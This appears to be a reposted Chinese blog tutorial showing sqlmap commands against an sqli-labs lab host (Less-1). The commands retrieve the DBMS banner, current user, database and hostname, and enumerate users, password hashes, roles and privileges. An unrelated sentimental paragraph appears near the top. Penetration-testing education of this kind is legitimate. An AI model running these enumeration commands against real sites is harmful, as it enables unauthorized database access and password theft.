注入工具 -- sqlmap(检索DBMS信息)

自从你删了我以后,我看了一年五个月的资料,时隔一年五个月,你突然出现在我的访客里,我呆坐了一夜,笑着哭,哭着笑,瞒着所有人我还是很喜欢你。。。

一、sqlmap检索DBMS Banner

–banner或者-b

sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” -b

在这里插入图片描述

二、sqlmap检索DBMS当前用户

sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --current-user

在这里插入图片描述

三、sqlmap检索DBMS当前数据库

sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --current-db

在这里插入图片描述

四、sqlmap检索DBMS当前主机名

sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --hostname

在这里插入图片描述

五、sqlmap探测当前用户是否是数据库管理员

sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --is-dba

在这里插入图片描述

六、枚举DBMS用户

sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --user

在这里插入图片描述

七、枚举DBMS用户密码

sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --password

在这里插入图片描述

八、枚举DBMS权限

sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --role

在这里插入图片描述

sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --privileges

在这里插入图片描述

禁止非法,后果自负

欢迎大家关注公众号:web安全工具库

在这里插入图片描述

发布了82 篇原创文章 · 获赞 0 · 访问量 1392

猜你喜欢

转载自blog.csdn.net/weixin_41489908/article/details/103626358
今日推荐